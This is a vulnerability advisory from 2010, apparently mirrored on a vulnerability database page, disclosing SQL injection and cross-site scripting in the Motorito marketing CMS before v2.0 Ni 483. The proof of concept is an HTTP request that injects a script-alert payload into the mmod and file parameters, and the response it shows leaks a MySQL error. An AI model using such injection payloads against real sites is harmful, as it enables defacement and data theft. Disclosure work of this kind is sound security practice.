Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Motorito Cross Site Scripting / SQL Injection

🗓️ 24 Sep 2010 00:00:00Reported by Mario Diaz CalderaType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 36 Views

Motorito XSS and SQL Injection Vulnerabilit

Code
`=============================================  
INTERNET SECURITY AUDITORS ALERT 2010-005  
- Original release date: March 30th, 2010  
- Last revised: September 23th, 2010  
- Discovered by: Mario Diaz Caldera  
- Severity: 5.5/10 (CVSS Base Score)  
=============================================  
  
I. VULNERABILITY  
-------------------------  
SQL Injection and XSS in Motorito < v2.0 Ni 483  
  
II. BACKGROUND  
-------------------------  
Motorito is an on-line marketing tool. It is used to manage the  
contents of Web Site, create new content, decide which news to put on  
the cover, update product catalog, manage the areas of promotion,  
manage users, edit the menu items, layout, send e-mails, etc.  
  
III. DESCRIPTION  
-------------------------  
This bug was found using CENTOS and the last release of Motorito with  
Apache 2.2.3 and PHP 5.1.6.  
  
To exploit the vulnerability only is needed use the version 1.0 of the  
HTTP protocol to interact with the application, and it is possible to  
check that the variables of the module index.php are not properly  
filtered.  
  
IV. PROOF OF CONCEPT  
-------------------------  
GET  
/?mmod=>"'><script>alert(4135)</script>&file=>"'><script>alert(4135)</script>  
HTTP/1.0  
Cookie: PHPSESSID=frdmbbue2fkns0dq33mm1152n3  
Accept: */*  
Accept-Language: en-US  
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)  
Host: www.testhostwithmotorito.es  
Referer: http://www.testhostwithmotorito.es/  
  
HTTP/1.1 200 OK  
Content-Length: 361  
Date: Fri, 05 Feb 2010 08:53:16 GMT  
Server: Apache/2.2.3 (CentOS)  
X-Powered-By: PHP/5.1.6  
Expires: Thu, 19 Nov 1981 08:52:00 GMT  
Cache-Control: no-store, no-cache, must-revalidate, post-check=0,  
pre-check=0  
Pragma: no-cache  
Connection: close  
Content-Type: text/html  
  
</td></tr></table><b>Database error:</b> Invalid SQL: SELECT parentID  
FROM sis_menus WHERE module='>"'><script>alert(4135)</script>' <br>  
<b>MySQL Error</b>: 1064 (You have an error in your SQL syntax; check  
the manual that corresponds to your MySQL server version for the right  
syntax to use near '><script>alert(4135)</script>'' at line 1)<br>  
Session halted.  
  
V. BUSINESS IMPACT  
-------------------------  
Public defacement, confidential data leakage, and database server  
compromise can result from these attacks. Client systems can also be  
targeted, and complete compromise of these client systems is also  
possible.  
  
VI. SYSTEMS AFFECTED  
-------------------------  
Motorito < v2.0 Ni 483  
  
VII. SOLUTION  
-------------------------  
Upgrade to next version of Motorito. It can be obtained from  
http://www.motorito.com  
Current version (at advisory publication 2.0 - Ni 891).  
  
VIII. REFERENCES  
-------------------------  
http://www.motorito.com  
http://www.isecauditors.com  
  
IX. CREDITS  
-------------------------  
This vulnerability has been discovered  
by Mario Diaz Caldera (mdiaz (at) isecauditors (dot) com).  
  
X. REVISION HISTORY  
-------------------------  
March 30, 2010: Initial release  
  
XI. DISCLOSURE TIMELINE  
-------------------------  
February 22, 2010: Discovered by Internet Security Auditors.  
June 14, 2010: Sent to the vendor.  
Response about revision and inclusion in  
Project Plan.  
September 23, 2010: Request for update. Response about correction.  
September 23, 2010: Sent to public lists.  
  
XII. LEGAL NOTICES  
-------------------------  
The information contained within this advisory is supplied "as-is"  
with no warranties or guarantees of fitness of use or otherwise.  
Internet Security Auditors accepts no responsibility for any damage  
caused by the use or misuse of this information.  
  
XIII. ABOUT  
-------------------------  
Internet Security Auditors is a Spain based leader in web application  
testing, network security, penetration testing, security compliance  
implementation and assessing. Our clients include some of the largest  
companies in areas such as finance, telecommunications, insurance,  
ITC, etc. We are vendor independent provider with a deep expertise  
since 2001. Our efforts in R&D include vulnerability research, open  
security project collaboration and whitepapers, presentations and  
security events participation and promotion. For further information  
regarding our security services, contact us.  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
24 Sep 2010 00:00Current
motoritoxsssql injectioninternet security auditorsvulnerabilitycentosapachephphttp protocolproof of conceptbusiness impactsystem affectedupgradereferencescreditsdisclosure timelinelegal noticesabout
36